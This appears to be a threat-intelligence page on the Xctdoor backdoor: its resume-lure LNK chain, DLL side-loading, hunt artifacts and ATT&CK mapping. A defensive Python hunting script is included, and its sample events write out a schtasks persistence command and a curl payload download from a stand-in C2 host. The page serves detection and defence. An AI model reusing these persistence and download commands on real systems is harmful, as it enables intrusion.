
Xctdoor

Xctdoor is a backdoor associated with North Korea (DPRK) activity. It has been delivered through more than one intrusion chain: malicious Windows shortcut (LNK) files disguised as resume documents, and a separate campaign in which the malware was disguised as a security installation program.

In the resume-themed chain, opening the LNK displays a decoy resume while silently creating batch (.bat), PowerShell (.ps1), and VBScript (.vbs) files with random names under C:\Users\Public\Videos. The PowerShell script registers a scheduled task named "office365" that runs the VBScript every 10 minutes; the VBScript launches a batch file, which uses curl to download further files from an external server. Some of the downloaded files are Base64-encoded and, once decoded, are saved as additional PowerShell scripts; one of them, p2.ps1, creates a shortcut in the Startup folder as a second persistence mechanism.

The later stage writes ProximityUxHost.exe, ProximityCommon.dll, settings.dat, and MicrosoftBing.LNK under an AppData path containing Microsoft.BingSearch365_8wekyb3d8bbwe. The legitimate ProximityUxHost.exe is then used to side-load ProximityCommon.dll, and once that DLL is loaded, the Xctdoor payload contained in settings.dat is injected into a legitimate process and executed. Analysis confirmed the malware attempting to communicate with an external command-and-control server.

Because the lure is a resume, the campaign particularly threatens functions that routinely open documents from outside the organization, including recruitment, sales, and customer service. Xctdoor was also deployed in a 2024 supply-chain compromise of a South Korean ERP vendor, the same vendor referenced in earlier compromises.

High-confidence artifacts to hunt for are a scheduled task named "office365" and the files ProximityCommon.dll, settings.dat, and MicrosoftBing.LNK under the Microsoft.BingSearch365_8wekyb3d8bbwe AppData path.
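
The chain above maps directly onto a handful of host-telemetry hunt rules. The script below is an added example, not code from this page or from any vendor report: it expresses the documented stages as rules over Sysmon-style process-creation, image-load and file-creation events and grades a host by which stages fired together. The task name, drop directory, ProximityUxHost.exe/ProximityCommon.dll pair, settings.dat, MicrosoftBing.LNK and the BingSearch365 path fragment are the artifacts named above; the user profile path, the directory layout under that fragment, the random script names, the Startup shortcut name and the download URL in the sample events are assumptions, constructed so the script runs offline.

```python
"""Hunt for the Xctdoor resume-lure chain in Sysmon-style telemetry.

Added example for this page, not code from the write-up or any vendor.
SAMPLE_EVENTS imitates Sysmon event IDs 1 (ProcessCreate), 7 (ImageLoad)
and 11 (FileCreate); every path, file name and URL in it is constructed
except the artifacts quoted on the page.
"""
import re
from collections import defaultdict

# Artifacts named on the page (all matching is case-insensitive).
DROP_DIR = r"c:\users\public\videos"                  # .bat/.ps1/.vbs drop directory
TASK_NAME = "office365"                                # task that re-runs the VBS
SIDELOAD_HOST = "proximityuxhost.exe"                  # legitimate host binary
SIDELOAD_DLL = "proximitycommon.dll"                   # planted DLL it loads
PACKAGE_FRAGMENT = "microsoft.bingsearch365_8wekyb3d8bbwe"  # AppData path fragment
STAGED_FILES = (SIDELOAD_DLL, "settings.dat", "microsoftbing.lnk")

SCRIPT_EXT = re.compile(r"\.(bat|cmd|ps1|vbs)$")
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$")


def _dir(path: str) -> str:
    """Directory part of a (lower-cased) Windows path."""
    return path.rsplit("\\", 1)[0]


def check_event(ev: dict) -> list[str]:
    """Return the hunt rules a single event matches (empty list if none)."""
    hits = []
    eid = ev.get("EventID")
    if eid == 11:  # FileCreate
        target = ev.get("TargetFilename", "").lower()
        if _dir(target) == DROP_DIR and SCRIPT_EXT.search(target):
            hits.append("script_dropped_in_public_videos")
        if STARTUP_LNK.search(target):
            hits.append("startup_folder_lnk")
        # settings.dat alone is too generic, so it is gated on the package path.
        if PACKAGE_FRAGMENT in target and target.endswith(STAGED_FILES):
            hits.append("sideload_staging_in_bingsearch_appdata")
    elif eid == 1:  # ProcessCreate
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        # Task registered via schtasks.exe or the PowerShell cmdlet.
        if TASK_NAME in cmd and (
            (image.endswith("\\schtasks.exe") and "/create" in cmd)
            or (image.endswith("\\powershell.exe") and "register-scheduledtask" in cmd)
        ):
            hits.append("scheduled_task_office365")
        # curl.exe launched by a batch file (cmd.exe) and writing a file to disk.
        if image.endswith("\\curl.exe") and parent.endswith("\\cmd.exe") and (
            " -o " in cmd or "--output" in cmd
        ):
            hits.append("curl_download_via_batch")
    elif eid == 7:  # ImageLoad
        image = ev.get("Image", "").lower()
        loaded = ev.get("ImageLoaded", "").lower()
        # Side-load shape: the host loads the DLL from its own directory, outside C:\Windows.
        if (image.endswith("\\" + SIDELOAD_HOST) and loaded.endswith("\\" + SIDELOAD_DLL)
                and _dir(image) == _dir(loaded) and not loaded.startswith("c:\\windows\\")):
            hits.append("proximity_dll_sideload")
    return hits


def hunt(events: list[dict]) -> dict[str, list[int]]:
    """Map each rule that fired to the indexes of the events that triggered it."""
    found = defaultdict(list)
    for i, ev in enumerate(events):
        for rule in check_event(ev):
            found[rule].append(i)
    return dict(found)


def verdict(events: list[dict]) -> str:
    """The task name and the side-load pair are high-confidence on their own;
    otherwise two independent stages firing on one host is the signal."""
    rules = set(hunt(events))
    if rules & {"scheduled_task_office365", "proximity_dll_sideload"} or len(rules) >= 2:
        return "high"
    return "medium" if rules else "clean"


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
USER = r"C:\Users\jdoe"                                                # constructed profile
PKG = USER + r"\AppData\Local\Microsoft.BingSearch365_8wekyb3d8bbwe"   # constructed layout
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",            # benign noise
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe", "TargetFilename": USER + r"\Documents\notes.txt"},
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\Public\Videos\k7qz1.vbs"},
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\Public\Videos\m3xp8.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": PS,
     "CommandLine": r'schtasks /Create /F /SC MINUTE /MO 10 /TN office365 /TR "wscript.exe C:\Users\Public\Videos\k7qz1.vbs"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -s -o C:\Users\Public\Videos\p2.txt http://c2.example.invalid/p2"},
    {"EventID": 11, "Image": PS, "TargetFilename": PKG + r"\ProximityCommon.DLL"},
    {"EventID": 11, "Image": PS, "TargetFilename": PKG + r"\settings.dat"},
    {"EventID": 11, "Image": PS, "TargetFilename": PKG + r"\MicrosoftBing.LNK"},
    {"EventID": 11, "Image": PS,
     "TargetFilename": USER + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sync.lnk"},
    {"EventID": 7, "Image": PKG + r"\ProximityUxHost.exe", "ImageLoaded": PKG + r"\ProximityCommon.DLL"},
]

if __name__ == "__main__":
    for rule, idx in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{rule:45} events {idx}")
    print("verdict:", verdict(SAMPLE_EVENTS))
```

The rules are deliberately behavioural rather than hash-based: the script names are random per victim, so the drop directory, the task name, the Startup-folder LNK and the host-loads-DLL-from-its-own-directory shape are what survive across samples. The curl rule on its own is noisy in environments where batch scripts legitimately call curl, which is why the verdict only treats it as high when another stage fires alongside it.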

MITRE ATT&CK

Techniques & procedures

12 distinct techniques documented for this family, organized by ATT&CK tactic. A technique that ATT&CK places under more than one tactic (T1053.005, T1055, T1547.001) is listed under each of them, so the same evidence excerpt appears more than once.

Initial Access

1 technique

T1566.001 Spearphishing Attachment (evidence: 1)

document files disguised as resumes can be easily opened in a work environment... when opening resume files or document-type attachments from unknown sources

Execution

5 techniques

T1053.005 Scheduled Task (evidence: 1)

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1059.001 PowerShell (evidence: 1)

batch files (.bat), PowerShell scripts (.ps1), and VBScript files (.vbs) with random names are created... the newly created PowerShell script is subsequently executed.

T1059.003 Windows Command Shell (evidence: 1)

The batch file executed by VBScript uses the `curl` command to download additional files from an external server.

T1059.005 Visual Basic (evidence: 1)

The VBScript file then executes a batch file, which triggers the next phase of malicious behavior.

T1204.002 Malicious File (evidence: 1)

Execution of a malicious LNK file disguised as a resume

Persistence

2 techniques

T1053.005 Scheduled Task (evidence: 1)

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

p2.ps1 creates a shortcut on the Startup path

Privilege Escalation

3 techniques

T1053.005 Scheduled Task (evidence: 1)

This PowerShell script registers a Task Scheduler job named “office365” to ensure the VBScript file runs every 10 minutes.

T1055 Process Injection (evidence: 1)

after ProximityCommon.dll was loaded, the backdoor malware Xctdoor (contained in settings.dat) was injected into the legitimate process and executed.

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

p2.ps1 creates a shortcut on the Startup path

Defense Evasion

3 techniques

T1036 Masquerading (evidence: 2)

Threat actors name the files to resemble resume documents containing company names and job titles, and when executed, they display a legitimate decoy file alongside the malicious file to lower the user’s suspicion.

T1055 Process Injection (evidence: 1)

after ProximityCommon.dll was loaded, the backdoor malware Xctdoor (contained in settings.dat) was injected into the legitimate process and executed.

T1140 Deobfuscate/Decode Files or Information (evidence: 1)

Some of the downloaded files are encoded in Base64 and, after decoding, are saved as additional PowerShell scripts

Command and Control

2 techniques

T1071 Application Layer Protocol (evidence: 1)

Analysis revealed that this malware attempted to communicate with a specific external C2 server.

T1105 Ingress Tool Transfer (evidence: 1)

The batch file executed by VBScript uses the `curl` command to download additional files from an external server.
